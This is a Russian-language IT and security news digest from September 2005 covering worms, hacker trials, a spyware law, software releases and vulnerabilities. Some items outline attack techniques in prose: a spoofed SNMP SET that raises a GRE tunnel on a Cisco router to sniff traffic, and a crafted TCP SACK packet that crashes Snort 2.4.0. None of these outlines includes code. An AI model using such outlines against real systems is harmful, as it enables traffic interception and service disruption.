Очередную полезную статью подкинули на сайте opennet.ru. В статье "Cisco SNMP configuration attack with a GRE tunnel" демонстрируется атака на маршрутизатор Cisco через открытую на запись, для служебного IP, SNMP community. Цель атакующего - запустить GRE туннель на свою машину (используя SNMP SET и обойдя ACL послав поддельный UDP пакет), через который организовать прослушивание трафика.
Статья

18/09/2005 11:39 Жертв хакеров призвали к восстанию
Современные информационные системы уже страдают от уязвимостей, а со временем ИТ будут усложняться и «дыр» станет еще больше. Пользователи должны «восстать» и потребовать от поставщиков ПО возмещения ущерба в случае успешных хакерских атак, заявил профессор Гамбургского университета, академик прикладной информатики Клаус Бранштайн (Klaus Brunnstein) на конференции по безопасности ИТ Gartner IT Security Summit. Попытка защититься от взлома, усложняя системы, — тщетна, считает профессор. — Это все равно, что изгонять дьявола при помощи Вельзевула". По его мнению, рост хакинга вызван рядом предубеждений, в том числе о необходимости усложнения систем. Взаимодействие одних незащищенных систем с другими усугубляет проблему. По мнению Бранштайна, более защищенные технологии распространятся только тогда, когда произойдет фундаментальное переосмысление проблемы, в том числе — переход от самостоятельных систем защиты к функциям, встроенным непосредственно в приложения. Также академик высказал мысль о том, что любая программа должна обязательно сохранять данные, если в ней произошел сбой, и подверг критике поставщиков, которые, по его мнению, сопротивляются таким уступкам. Заставить их пересмотреть свои взгляды, считает академик, смогут только сами пользователи. Им надо «восстать» и заняться лоббированием законов защиты потребителей, реализующих компенсацию ущерба. «Производителей нужно заставить платить за ущерб. Однозначно, Microsoft заработала достаточно денег, чтобы делать это», — считает Клаус Бранштайн.
CNews

18/09/2005 10:53 Беспроводные сети обгоняют проводные
Разработан чип беспроводной связи, позволяющий развивать скорость обмена данными, превышающую скорость обмена по проводам. Скорость чипа такова, что можно без проблем смотреть по беспроводному каналу телевидение высокой четкости, слушать музыку, играть в игры, делать звонки. Чип True MIMO произведен компанией Airgo Networks и способен развивать скорость передачи до 240 Мбит в секунду. По данным компании, это в три раза быстрее, чем самая быстрая на сегодняшний день скорость передачи данных по беспроводному каналу. Сейчас компания ищет партнеров по распространению новинки. Предполагается, что чип будет в продаже к концу 2005 года. Таким образом, чипсет от Airgo дает возможность пользоваться всеми благами интернета — видео и аудиоконтент, прямые трансляции и конечно же — рич-медиа реклама. Причем, чип полностью совместим со стандартами 802.11b, 802.11g и Wi-Fi. При том, что чип работает быстрее, чем стандартный Ethernet 10/100, у него есть несомненное преимущество — отсутствие проводов, полная свобода перемещения. Он может быть встроен в любую электронику, может стать основой электронного дома будущего, где все коммуникации осуществляются без участия проводов. То же самое можно сказать о концепции полностью беспроводного офиса. Повсеместное внедрение этого чипа может существенным образом подтолкнуть развитие беспроводных коммуникаций и интернета. До последнего времени использование интернета без проводов было некоей вынужденной мерой, которая не могла заменить проводной широкополосный доступ.
Источник

18/09/2005 10:32 Звукозаписывающие холдинги подали на "Байду" в суд
Четыре крупнейших звукозаписывающих компании мира подали в суд на ведущий китайский поисковый портал Baidu.com, обвинив его в нарушении авторских прав, сообщает агентство Reuters. Как ранее сообщалось, накануне Baidu выставил свои акции на американской бирже NASDAQ, и их цена быстро выросла втрое. Перед выходом на NASDAQ руководство "Байду" пообещало, что решит проблему индексирования поисковиком пиратских сайтов с нелегальными mp3-файлами. Ведущие игроки мировой индустрии звукозаписи высказывали недовольство тем, что китайцы используют Baidu.com для поиска контрафактных копий защищенных авторским правом музыкальных композиций. Вероятно, теперь подавшие иски компании - Universal, EMI, Warner Music и Sony BMG - посчитали, что обещания не были выполнены, хотя формально поисковик не хранит нелегальные файлы, а лишь предоставляет ссылки на них.
Lenta.Ru

17/09/2005 11:31 Обнаружение факта использования эксплоитов для Linux и FreeBSD
В статье "Real-time exploits tracking with Anti-Exploit" показан пример использования ПО AntiExploit, которое через взаимодействие с модулем ядра dazuko для Linux и FreeBSD, осуществляет постоянный контроль файловых операций и определяет факт использования популярных эксплоитов по базе контрольных сумм, сообщает opennet.ru.
Статья

17/09/2005 11:18 Суровый закон против "шпионского" ПО
Губернатор штата Вашингтон подписал закон "О шпионском программном обеспечении" (On Regulating Spyware). Закон отличается широким толкованием понятия Spyware и весьма строгими мерами наказания за допущенные нарушения. В частности, закон запрещает "обманным способом" изменение стартовой страницы браузера, перенастройку установленного по умолчанию прокси-сервера или подмену провайдера (речь идёт, очевидно, о "дайлерах", встречающихся на сайтах "для взрослых") и изменение списка закладок в браузере. Запрещено удалённо менять настройки подключения в интернет без ведома пользователей. Естественно, запрещён сбор личной информации "преднамеренно обманными способами" и передача их другим лицам, в том числе, использование троянов и клавиатурных "жучков". К числу незаконных деяний также отнесено и обманное препятствование попыткам пользователя деинсталлировать или дезактивировать программное обеспечение (т.е. программы, которые без вашего ведома снова устанавливаются на компьютер и активируются снова, этим законом однозначно запрещены). Запрещено и обманное уведомление о том, что та или иная программа дезактивирована, если при этом она продолжает работать. Выведение из строя средств защиты - антивирусов, брандмауэеров и антишпионских программ - также запрещается. Обращает на себя внимание и то, что в штате Вашингтон отныне запрещено "открытие многочисленных, последовательных, отдельных рекламных страниц в браузере владельца или оператора компьютера без его, оператора или владельца разрешения, так, что их невозможно закрыть, не выключая компьютер или закрывая браузер". Кроме того, в данном законопроекте постоянно встречается упоминание "обманных мер". В конце 2004 года в США был одобрен общефедеральный закон, запрещающий spyware и вызвавший волну неприязни со стороны правозащитных организаций по причине узкого толкования spyware (на что вашингтонский закон пожаловаться не может) и из-за упора на "преднамеренный обман".
Источник

17/09/2005 10:56 Технологии "Лаборатория Касперского" в устройствах ZyXEL
Компании ZyXEL Communications и "Лаборатория Касперского" заключили соглашение, в результате которого антивирусная технология последней интегрирована в семейство многофункциональных межсетевых экранов ZyWALL UTM, реализующих единую систему управления сетевой защитой (Unified Threat Management, UTM). Пользователи устройств ZyWALL 5 EE, ZyWALL 35 EE и ZyWALL 70W EE смогут воспользоваться преимуществами новой версии операционной системы с антивирусной функциональностью ZyNOS4 и протестировать возможности антивирусной фильтрации в течение трехмесячного ознакомительного периода. По завершении указанного срока, предоставление онлайновых услуг антивирусной фильтрации будет осуществляться по подписке. При работе под управлением ZyNOS4 устройства этой серии в одном конструктиве реализуют возможности межсетевого экрана, виртуальной частной сети (IPSec VPN), резервирования и балансирования нагрузки WAN-интерфейсов, управления полосой пропускания приложений, контентной фильтрации по ключевым словам и категориям сайтов, антивирусной фильтрации, обнаружения вторжений и хакерских атак (IDP, Intrusion Detection and Prevention) и фильтрации нежелательных почтовых сообщений.
Источник

17/09/2005 10:32 RIAA рассылает угрозы пиринговым компаниям
Ассоциация звукозаписывающих компаний США, вооружённая успешным исходом дела против сети Grockster, рассылает угрозы компаниям, управляющим файлообменными сетями. Последними объектами угроз стали, по некоторым данным, компании BearShare, LimeWire и WinMX. RIAA требует от них немедленно внедрить фильтры, которые блокировали бы распространение по сетям нелегального развлекательного контента, собственно, аудиозаписей. В июне Верховный суд США, разбирая дело по иску MGM против Grokster Ltd. и StreamCast Networks Inc. постановил, что ответчики должны принять все меры по предотвращению нелегального распространения аудио- и видеозаписей по своим сетям, в т.ч. фильтры и другие технологические средства. Теперь RIAA требует этого от всех, выражая "радостную готовность" сотрудничать с теми, кто ведёт дела в полном соответствии с законом. В разосланных письмах с приказами прекратить противоправную деятельность, RIAA предлагает своим потенциальным жертвам выбор: либо те устанавливают фильтры, либо их ждёт суд и ликвидация.
Подробности

17/09/2005 10:08 База данных будет сопровождать голландцев от колыбели до могилы
Министерство здравоохранения Нидерландов объявило о планах создать электронную базу данных, в которой будут вестись досье на каждого гражданина — от его рождения до смерти. Схема, которая заработает с 1 января 2007 года, предусматривает сбор и хранение в течение неограниченного срока всех сведений о человеке, включая медицинские, школьные и полицейские записи, а также записи о семейном положении. Ведение этих досье будет вменяться в обязанность врачам, учителям и другим социальным работникам. Когда система заработает, все бумажные документы, относящиеся к нидерландским детям, будут преобразованы в цифровую форму. Эти файлы будут снабжаться уникальным идентификационным номером, чтобы досье ребенка не затерялось, например, при переезде. Доступ к файлам получит ряд государственных учреждений, но частным лицам или компаниям он будет закрыт, утверждает правительство Нидерландов. По словам министра здравоохранения, социального обеспечения и спорта Королевства Нидерланды Клеменс Росс, досье призваны улучшить обмен информацией между разными государственными ведомствами и гарантировать, что голландские дети «смогут своевременно получить должную заботу». Министр убеждена, что это уменьшит преступность среди несовершеннолетних и будет способствовать решению других подростковых проблем.
Подробности

17/09/2005 09:47 Основатель одного из старейших провайдеров мира обвинен в хакерстве
Один из "пионеров" британского Интернета 50-летний Клиффорд Стэнфорд (Clifford Stanford), основавший в 1992 году провайдерскую компанию Demon Internet, ставшую одним из первых массовых коммерческих интернет-провайдеров мира, признан виновным в перлюстрации электронных сообщений бывшей руководительницы управляющего совета центрального лондонского муниципального округа Вестминстер Ширли Портер (Shirley Porter). Портер за годы своего пребывания на государственных постах была замешана в серии политических и финансовых скандалов и в итоге лишилась постов и титулов. В 2002 году она вела с некими людьми по электронной почте переписку, в которой обсуждала обстоятельства одного из скандалов - историю 15-летней давности о крупномасштабном подкупе депутатов-консерваторов посредством аферы с жильем. Разбирательства по этому делу, в котором фигурировали огромные денежные суммы, продолжаются до сих пор - в начале 2000-х следствие принуждало Портер выплатить около 27 миллионов фунтов штрафа, но женщина, укрывающаяся уже несколько лет от британского правосудия в Израиле, заявляла, что все ее средства составляют 300 тысяч фунтов, и больше заплатить она не в состоянии. Из перехваченных Стэнфордом писем становилось ясно, что Ширли Портер скрывает реальные объемы своих сбережений, и в ее распоряжении находятся суммы, значительно превышающие 300 тысяч фунтов - вероятно, они размещены в оффшорных зонах. Эта информация была необходима Стэнфорду для давления на сына Ширли Портер Джона Портера, который вмешивался в его бизнес. Стэнфорд занимался самостоятельным расследованием вместе с частным детективом Джорджем Лидделом (George Liddell), который также стал обвиняемым по делу о перехвате писем. Изначально обвинение настаивало на том, что Стэнфорд и Лиддел шантажировали Портеров, однако это обвинение было снято и суд признал их виновными в несанкционированном проникновении в электронные сети. Оба признали свою вину и были приговорены к 6 месяцам тюрьмы с отсрочкой исполнения приговора на 2 года и к штрафу в 20 тысяч фунтов каждый.
Источник

16/09/2005 16:02 Марокканский суд допросил предполагаемого автора Zotob
Магистратский суд марокканского города Рабат во вторник допросил 18-летнего студента Фарида Эссебара в рамках следствия по делу о создании интернет-червя Zotob (Net-Worm.Win32.Bozori в классификации «Лаборатории Касперского»), сообщает Reuters. Эпидемия Zotob стала причиной перебоев в работе более чем 100 американских компаний, в том числе медиагигантов CNN и The New York Times. По словам адвоката Эссебара, студент отвечал на вопросы судей в течение 3 часов. «Мой клиент Эссебар был допрошен судьей в рамках следствия по делу о Zotob. По окончании допроса он вернулся в тюрьму Рабата», — рассказал адвокат Мохамед Фертат. Фертат уточнил, что Эссебар находится в тюрьме с 25 августа. Следующий допрос предположительного создателя Zotob запланирован на 21 сентября. Арест Эссебара в Марокко стал частью совместной операции, во время которой турецкие власти задержали еще одного подозреваемого — 21-летнего Атиллу Экиджи, сообщили предствители ФБР. Марокканские законы позволяют содержать подозреваемых в тюрьме в течение двух месяцев. В случае необходимости этот срок может быть продлен на такое же время еще пять раз. «Я полагаю, следствие признает его невиновным и не предъявит ему никаких обвинений», — отметил Фертат.
Источник

16/09/2005 13:58 Новый червь фальсифицирует Google
Антивирусная лаборатория компании Panda Software зафиксировала появление червя P2Load.A, который подменяет страницу интернет-поисковика Google. P2Load.A распространяется через P2P-сети, пиринговые программы Shareaza и Imesh. Он осуществляет это, копируя себя в папку общего доступа этих программ под видом исполняемого файла с именем Knights of the Old Republic 2, выдавая себя за файл компьютерной игры из серии «Звездных Войн». При запуске он отображает сообщение об ошибке, информирующее пользователя о том, что не найден определенный файл, и предлагающее скачать его. При этом червь заражает компьютер и вносит две основные модификации: изменяет стартовую страницу, отображая рекламу, и подменяет интернет-поисковик Google. Для этого червь изменяет на компьютере файл HOSTS таким образом, что когда пользователи пытаются открыть Google, они перенаправляются на страницу, выглядящую в точности как Google, но не относящуюся к этой компании — она размещена на сервере в Германии. Страница является точной копией Google и поддерживает все 17 языков Google, а также перенаправляет пользователей при совершении ими ошибки при вводе адреса, например wwwgoogle.com. Когда пользователь осуществляет поиск, отображаются результаты, идентичные Google, или же с небольшими вариациями. Однако, спонсорские ссылки, которые обычно отображаются в верхних строчках результатов поиска и соответствуют компаниям, оплатившим эту услугу, изменяются. При определенных поисках отображаются другие ссылки, установленные создателем вредоносного кода, что приводит к увеличению трафика этих сайтов.
Panda Software

16/09/2005 13:13 Microsoft вторглась в вотчину Adobe
В рядах противников Microsoft намечается пополнение – к традиционным Linux и Apple, а также более позднему Google, похоже, примкнёт Adobe. Microsoft представила семейство продуктов для Windows Vista — Microsoft Expression, набор ПО для профессионального дизайна. В состав Microsoft Expression входят три составляющих: Acrylic Graphic Designer, Quartz Web Designer и Sparkle Interactive Designer. Эти продукты должны составить прямую конкуренцию Adobe Photoshop, Adobe Illustrator, Adobe GoLive и Macromedia Flash. Программы позволяют разработчикам использовать различные технологии (векторную и растровую графику, трёхмерную графику, звук, изображения, анимацию) и интегрировать полученную графическую среду в любые приложения, создаваемые с помощью профессиональной среды Microsoft Visual Studio.
Источник

16/09/2005 12:45 Уязвимость в PHP-Nuke
В популярном ПО обнаружена уязвимость, которая связана с ошибками во встроенном WYSIWYG-редкаторе. Подробности уязвимости, а также возможные последствия её использования не разглашаются. Выпущена версия 7.9, устраняющая уязвимость.
Подробности

16/09/2005 12:11 Сотрудники управления СБУ в Харьковской области задержали хакера
В феврале текущего года сотрудники управления СБУ в Харьковской области задержали хакера из Новой Водолаги, который на протяжение 2004 года незаконно пользовался Интернетом за счет различных организаций, передает корреспондент From-UA. Его приглашали как специалиста по настройке компьютерной техники. Однако, параллельно с основной работой, злоумышленник переписывал на свою дискету так называемый PWL- файл, в котором зашифрован код и логин той или иной организации для доступа к сети Интернет. Таким образом ему удалось "надуть" на 250 гривен контрольно- ревизионный отдел, ООО "Международная юридическая служба" и отдел образования Новой Водолаги. Последней его "жертвой" стало местное отделение партии СДПУ (о). Приговорили "горе- хакера" к двум годам лишения свободы: ч. 2 ст. 69 УК Украины , то есть завладение компьютерной информации путем мошенничества, совершенное повторно. Однако суд освободил злоумышленника от отбытия наказания с испытанием на один год.
Источник

16/09/2005 11:42 Безопасность в Vista: что нас ожидает
В четверг на MSDNовском чате вице-президент Microsoft Майк Нэш (Mike Nash) рассказал о некоторых нововведениях в Windows Vista с точки зрения безопасности, сообщает bugtraq.ru. Большие усилия прилагаются для защиты пользователей от вредоносных программ. Нэш подтвердил намерение MS дать всем пользователям Vista возможность использования технологии анти-spyware. Интересным новшеством обещает стать защищенный режим в IE, при котором броузер будет изолирован от других процессов операционной системы и не будет иметь прав на запись за пределами каталога Temporary Internet Files, что должно снизить риск от "тихой" установки всевозможных вредоносных плагинов. Большинство объектов ActiveX будет по умолчанию запрещено; будет улучшен встроенный файрволл; будет продолжена работа по более аккуратному определению привилегий, необходимых для функционирования различных служб, начатая в Server 2003. Наконец, в готовящуюся к выходу в ноябре Visual Studio 2005 будут включены многие средства, используемые внутри самой MS для написания более безопасного кода, в том числе интеграция с анализаторами кода PreFast и FxCop.
Подробности

16/09/2005 11:23 Что будет нового в OpenBSD 3.8
Theo de Raadt опубликовал список новшеств, которые планируется включить в следующий релиз ОС OpenBSD 3.8, сообщает opennet.ru. Релиз системы ожидается 1 ноября. Olivier Lemaire предложил к тестированию систему бинарных обновлений для OpenBSD - SPMS. Система разработана для администраторов, которые обслуживают множество серверов под управлением OpenBSD, и призвана ускорить и упростить процесс обновления.
Подробности

16/09/2005 10:57 Новые релизы Firefox и Mozilla устранят вскрывшиеся дефекты
Mozilla Foundation планирует выпустить новые версии своих веб-браузеров Firefox и Mozilla, чтобы устранить недавно обнаруженный серьезный баг и еще ряд ошибок. Решение о выпуске новых, так называемых точечных релизов было принято после того, как на прошлой неделе обнаружилась проблема, связанная со способом управления международными именами доменов (IDN). Она приводит к тому, что злоумышленники могут тайно исполнять вредоносные программы на компьютерах пользователей. Известно, что хакеры уже работают над эксплойтами. «Как только мы узнали об этом, мы сразу начали оценивать варианты, — рассказывает технический директор Mozilla Foundation Майк Шрепфер. — Скоро выйдут версии Firefox 1.0.7 и Mozilla 1.7.12 с исправленной ошибкой IDN. Мы постараемся выпустить их как можно быстрее». Кроме бага IDN, в новых версиях будет исправлена одна функциональная ошибка и ряд проблем безопасности, о которых еще не сообщалось. Mozilla Foundation быстро отреагировала на поступившее на прошлой неделе сообщение о баге IDN и в 24 часа представила временную поправку. Однако эта поправка отключает поддержку IDN, а обновления, которые сейчас тестируются, действительно исправят ошибку и восстановят поддержку IDN, пообещал Шрепфер. Адреса IDN и раньше доставляли Mozilla неприятности. Вышедшая в феврале поправка для Firefox исправляла дефект, позволявший отправлять пользователя на подложные сайты с использованием специальных доменных имён. Пока Mozilla Foundation и сообщество open source работают над исправлением бага IDN, обнаруживший его секьюрити-эксперт сообщил еще об одной проблеме Firefox. В среду Том Феррис рассказал, что в Firefox1.5 beta 1 существует проблема IDN, аналогичная той, которую он вскрыл на прошлой неделе.
Подробности

16/09/2005 10:43 Компания Oracle отправит в космос программиста
Один из ведущих мировых разработчиков корпоративного ПО Oracle объявила о завершении своего конкурса Oracle Space Sweepstakes, в рамках которого клиентам компании предоставлялась возможность выиграть билет на частный космический корабль. Как сообщает издание CNet News, билет в космос выиграл разработчик ПО из фирмы Stryker 30-летний Брайан Эмметт (Brian Emmett). Согласно условиям мероприятия, он представил на конкурс свое тестовое задание по программированию, после чего был случайным образом выбран из числа прошедших квалификацию. Теперь программист полетит в суборбитальный космический полет одним из первых коммерческих рейсов компании Space Adventures, также выступившей организатором конкурса Oracle. Space Adventures - пионер на рынке частных операторов космического туризма, расцвет которого экономисты предрекают в ближайшие годы после успешных испытаний прошлой осенью первого частного космолета SpaceShipOne. Компания работает с американскими и российскими партнерами в космической отрасли и уже приняла участие в организации полетов жвух первых космических туристов - Дэнниса Тито и Марка Шаттлуорта.
Подробности

15/09/2005 16:24 Релиз Slackware Linux 10.2
Вышла новая версия 10.2 дистрибутива Slackware, которая включает ядро 2.4.31, также возможно использовать ядро 2.6.13, доступное в каталоге /testing. Slackware 10.2 также поддерживает новую glibc (2.3.5) с поддержкой NPTL нитей, в наличии X.Org 6.8.2, KDE 3.4.2 и XFce 4.2.2, обновлены средства разработки (gcc-3.3.6, Perl 5.8.7, Python 2.4.1), добавились новшества, такие как поддержка SASL в sendmail, система контроля версий Subversion 1.2.3, браузер Firefox 1.0.6, почтовый и новостной клиент Thunderbird 1.0.6. В комплект входит коллекция GTK+ приложений, включая abiword-2.2.9, gaim-1.5.0, gimp-2.2.8, gkrellm-2.2.7, gxine-0.4.8 и pan-0.14.2.91.
opennet.ru

15/09/2005 15:44 Осторожно в Интернете как грибы растут "пирамиды"
В течение последних трех лет в Интернет появилось множество серверов, как и обычные "пирамиды", за "скромное вознаграждение" предлагающих "быстро сделать большие деньги". Например, фирма Five Star Auto Club обещала онлайновым покупателям возможность бесплатно взять в аренду "автомобиль своей мечты", и получение прибыли от 180 до 80000 долларов США. Для этого нужно было ежегодно платить членские взносы, вносить 100 долларов ежемесячно и привлекать новых членов "автоклуба". Как выяснили представители FTC (Federal Trade Commission), ни один клиент Five Star Auto Club не получил ни обещанного заработка, ни возможности арендовать автомобиль. Но это, так сказать, не самый характерный пример. Нынешние виртуальные пирамиды действуют значительно тоньше. Общеизвестно, что абсолютно все производители различных товаров вкладывают очень большие деньги в рекламу. И порой эти рекламные акции, по крайней мере внешне, носят чисто благотворительный характер. Например, в виде спонсирования спортивных и иных мероприятий, участники и победители которых получают довольно большие денежные или материальные призы. Естественно, подобные акции проводятся и в Интернете. В киберпространстве, как правило, деньги предлагается получать за то, что вы будете держать у себя на экране специализированный рекламный баннер, пока сами путешествуете по необъятным просторам Сети. За каждый час такого просмотра обещается выплачивать некоторую премию, которая, в течение месяца, может складываться в 20, 50 и даже более долларов США. Но далеко не все и не всегда эти деньги вообще выплачивают. К примеру, компания AllAdvantage за весь прошлый год еще не выплатила никому никакого гонорара.
Более подробно

15/09/2005 14:54 Windows-версия Oracle 10g R2
Oracle объявила о выходе Windows-версии СУБД Oracle Database 10g Release 2. В комплект поставки программного продукта включен набор расширений Oracle Database Extensions for .Net, который облегчает создание .Net-приложений, работающих с СУБД. Основным новшеством Oracle 10g, вышедшей в конце прошлого года, стали grid-функции, которые, в частности, позволяют связать несколько серверов СУБД и разделить между ними рабочую нагрузку. Добавлена также была автоматизированная система управления хранением. В Release 2 последняя расширена - теперь она может работать с кластеризованными базами данных. Кроме того, как сообщают в Oracle, в новой версии реализована возможность автоматизации ряда задач администрирования, оптимизирована производительность, улучшена безопасность. Первыми платформами, для которых была выпущена редакция Release 2, стали в начале лета Linux и Unix.
"Открытые системы"

15/09/2005 14:36 Microsoft исправляет исправление Windows 2000
Как сообщает bugtraq.ru, В минувшую пятницу Microsoft отозвала обещанное вторничное обновление, заявив, что для него потребуется дополнительное тестирование. Вместо этого вышел обновленный вариант кумулятивного обновления Rollup 1 Windows 2000 Service Pack 4, первый вариант которого был выпущен в июне и вызвал проблемы у ряда пользователей. Cкачать можно по ссылкам, приведённой ниже.
Для русской версии
Для английской версии

15/09/2005 14:33 Билл Гейтс показал Windows Vista и новый Office
Билл Гейтс на конференции разработчиков Microsoft в Лос-Анджелесе (Microsoft Professional Developers Conference, PDC) продемонстрировал новую операционную систему Windows Vista, а также следующий офисный пакет, известный в настоящее время под кодовым названием Office 12. По словам основателя Microsoft, Office 12 станет самым значительным обновлением соответствующей линейки программных продуктов компании с момента выхода Office 95 около десяти лет назад. В Microsoft отмечают, что с переходом на Office 12 можно будет полностью сфокусироваться на работе, а не на том, как эту работу выполнить. Несмотря на огромный функциональный потенциал Word и Excel, многие пользователи сейчас просто-напросто не могут задействовать все возможностями этих редакторов из-за сложностей с навигацией. В Office 12 данная проблема должна быть решена. На панелях инструментов Office 12 появятся вкладки графических команд, облегчающие и ускоряющие выполнение тех или иных операций. Кроме того, Microsoft упоминает систему Live Preview, представляющую собой набор разнообразных стилей для форматирования документов. Причем увидеть результат такого форматирования пользователи смогут сразу после наведения указателя мыши на один из стилей, доступных в галерее. При демонстрации Windows Vista упор был сделан на трехмерные закладки, а также специализированную панель Gadget, на которую можно добавлять различные объекты. Кстати, похожее решение под названием Widgets уже реализовала компания Apple, сообщает ZDNet.
Подробности

15/09/2005 13:32 Тин получил срок за записную книжку Пэрис Хилтон
17-летний тинейджер, чьи пол и личность держатся в секрете, приговорен к 11 месяцам тюрьмы за взлом в январе аккаунта мобильного телефона Пэрис Хилтон, актрисы и наследницы гостиничной империи. Тинейджер, проживающий в Массачусетсе, взломал компьютерную сеть оператора связи T-Mobile, получил доступ к записной книжке Хилтон, содержащей номера многих голливудских знаменитостей, и выложил ее в интернет. Кроме того тинейджер угрожал взрывами бомб в колледжах.
Источник

15/09/2005 13:11 Российские спамеры вредят больше, чем зарабатывают
Среднегодовой доход российских спамеров оценивают в $2 млн., или 55 млн. рублей, а ущерб от нежелательных рассылок - в 850 млн. рублей. В ходе исследования эффективности технических мер противодействия распространению спама, осуществляемого в рамках Проекта «АнтиСпам», была проведена оценка доходов российских спамеров. Согласно данным, приведенным в отчете «Спам-фильтрация: полевые испытания», российские спамеры зарабатывают около $2 млн. в год. За время исследования общее количество спама, получаемого на каждый почтовый адрес в домене IFAP.ru, составляло от 1894 до 2614 сообщений в месяц. В среднем, 170 из этих сообщений имели зарубежное происхождение, а 230 содержали рекламу услуг самих спамеров. Таким образом, в среднем российские спамеры ежемесячно получают заказов на 1854 рассылки. При условии, что стоимость услуг по рассылке спама составляет обычно 2–3 тысячи рублей, можно подсчитать, что за месяц российские спамеры зарабатывают около 4,6 млн. рублей, что составляет более 55 млн. рублей в год. Авторы отчета отмечают, что за основу расчетов бралась средняя цена на рассылку спама по 1 млн. адресов электронной почты, тогда как некоторые мелкие спамеры демпингуют, предлагая те же услуги за более низкую цену.
Источник

15/09/2005 12:29 Стрекотание клавиатуры как угроза для безопасности
Аудиозапись работы пользователя на клавиатуре можно расшифровать, утверждают ученые из Калифорнийского университета в Беркли. Метод основан на том, что каждая клавиша при нажатии издает характерный только для нее звук, и пользователи, которые обычно набирают примерно 300 знаков в минуту, оставляют достаточно времени между ударами, чтобы компьютер мог выделить отдельные звуки. В процессе исследования несколько 10-минутных записей работы пользователей были обработаны на компьютере с применением алгоритма, который расшифровывает до 96% вводимых символов. Метод работает с применением готовой звукозаписывающей аппаратуры на фоне музыки или звонка сотового телефона — и даже с так называемой «тихой» клавиатурой. Он позволяет перехватывать любые печатаемые документы, но руководитель проекта Дуг Тигар, профессор вычислительной техники и управления информацией Калифорнийского университета в Беркли, особо подчеркнул уязвимость паролей. «Пароли — это механизм аутентификации, который на самом деле нуждается в пересмотре. Это не скрытая атака. Она хоть и требует некоторого знакомства с вычислительной техникой, но большинство необходимх для нее компонентов широко доступны… Мы пользовались микрофонами за $10». Работа опирается на исследование, проведенное Дмитрием Азоновым и Ракешем Агравалем. которые продемонстрировали, как по аудиозаписям работы клавиатуры можно восстановить 80% текста. Однако эти эксперименты строго контролировались. Результаты будут представлены 10 ноября на конференции Ассоциации вычислительной техники в Александрии (штат Виржиния).
Более подробно

15/09/2005 12:05 Компания Gartner посоветовала всем отказаться от логинов и паролей
Известная консалтинговая компания Gartner на проводимом ей в Лондоне специальном саммите по вопросам компьютерной безопасности призвала высокотехнологичные компании мира как можно интенсивнее отказываться от практики идентификации авторизованных пользователей интернет-систем исключительно традиционными методами - при помощи логина и пароля, сообщает Lenta.ru. Как сообщает издание CNet News, аналитики компании заостряют внимание на том, что в последние годы цифровые злоумышленники все активнее овладевают технологиями несанкционированного перехвата данных, ведут новые разработки в этих областях, в результате чего красть чужие пароли для мошенников становится все легче, а "под ударом" оказываются даже опытные пользователи, которые хорошо умеют применять компьютерные технологии в повседневной деятельности, но имеют лишь базовые понятия о способах защиты своих данных. Это происходит на фоне того, что большинство компаний до сих пор применяет базовый способ авторизации для доступа к своим сервисам - ввод пользователем логина и пароля (PIN'а), которые часто передаются в незашифрованном виде. В результате обстановка в области цифровой безопасности ухудшается, жертвами мошенников становятся все больше людей, а суммы причиненного ущерба растут. Как ранее сообщалось, накануне Gartner публиковала доклад об исследовании текущего состояния сферы банковских технологий - эксперты компании также нашли, что нынешние методы защиты финансовой информации предоставляют высокотехнологичным мошенникам богатые возможности для совершения преступлений.
Подробности

14/09/2005 13:11 Анонимайзеры угрожают западу
В странах, где свобода слова в большей степени декларируется, чем обеспечивается на практике, «маскировка» пользователей Сети становится серьезным бизнесом. Появляются сервисы, позволяющие сохранять собственную анонимность при пользовании интернетом. Появившийся десять лет тому назад Anonymizer уже обрел 2 млн. активных пользователей. Ресурс субсидирует правительство США, надеющееся таким образом способствовать распространению свободы слова в Китае и Иране. По иронии судьбы, настоящую популярность сервис обрел на свободном Западе. ПО Anonymizer зашифровывает вводимые пользователем адреса веб-страниц. Сервер получает запрошенный контент и пересылает его пользователю. Весь процесс осуществляется автоматически, информация о запросах не сохраняется. Есть и ограничения – Anonymizer не позволяет анонимно загружать материалы в Сеть, а также блокирует доступ к материалам, запрещенным законодательством Соединенных Штатов. В 2004 году к 10 годам тюрьмы был приговорен голландский мошенник, попытавшийся прибегнуть к шатнтажу с использованием «анонимайзера». Эти ограничения пытаются преодолеть разработчики проекта Free Network Project (Freenet) – он призван обеспечить полную анонимность. «Нашей целью, - заявил основатель и координатор проекта Ян Кларке (Ian Clarke), - является создание системы, которая даст пользователям возможность обмениваться информацией в интернете, не раскрывая себя и без какой бы то ни было государственной цензуры».
Подробности

14/09/2005 12:43 Cтатья про создание VPN-сетей в Linux
На сайте Opennet.ru опубликована интересная и, вне всякого сомнения, полезная для многих алминистраторов статья Вячеслава Худякова под названием "Организация VPN соединений вида сеть-сеть с использованием IpSec OpenS/WAN". Статья описывает технологию объединения сетей нескольких удаленных офисов в единую распределенную сеть, с использованием IpSec OpenS/WAN под Linux.
Cтатья

14/09/2005 12:05 Московские хот-споты стало проще найти
Каталог WiFi.CNews.ru получил новое средство визуализации. Расположение точек беспроводного доступа в Москве теперь можно отслеживать с помощью проекта «3D Модель Москвы». Специалисты проекта внедрили в свой картографический сервис возможность работы с поисковой системой каталога WiFi.CNews.ru, теперь каждый пользователь карты mom.exe может оперативно узнать, где расположены ближайшие к нему хот-споты, сообщает "Независимый обзор провайдеров".
«3D Модель Москвы».

14/09/2005 11:33 В Snort найдена уязвимость
В ПО для обнаружения вторжений Snort найдена уязвимость, которая позволяет удаленному пользователю вызвать отказ в обслуживании приложения. Уязвимость существует в функции PrintTcpOptions() файла snort-2.4.0/src/log.c из-за ошибки в нулевом указателе разыменования. Удаленный пользователь может послать приложению пакет TCP/IP со специально сформированной опцией TCP SACK и вызвать отказ в обслуживании. Успешная эксплуатация уязвимости требует, чтобы Snort был запущен с ключом -v. Уязвимости присвоен рейтинг опасности «средняя». Уязвимы версии Snort 2.4.0 и более ранние. Для решения проблемы установите последнюю версию (2.4.1), доступную по CVS.
Источник

14/09/2005 11:06 Microsoft пропустила ежемесячный выпуск патчей
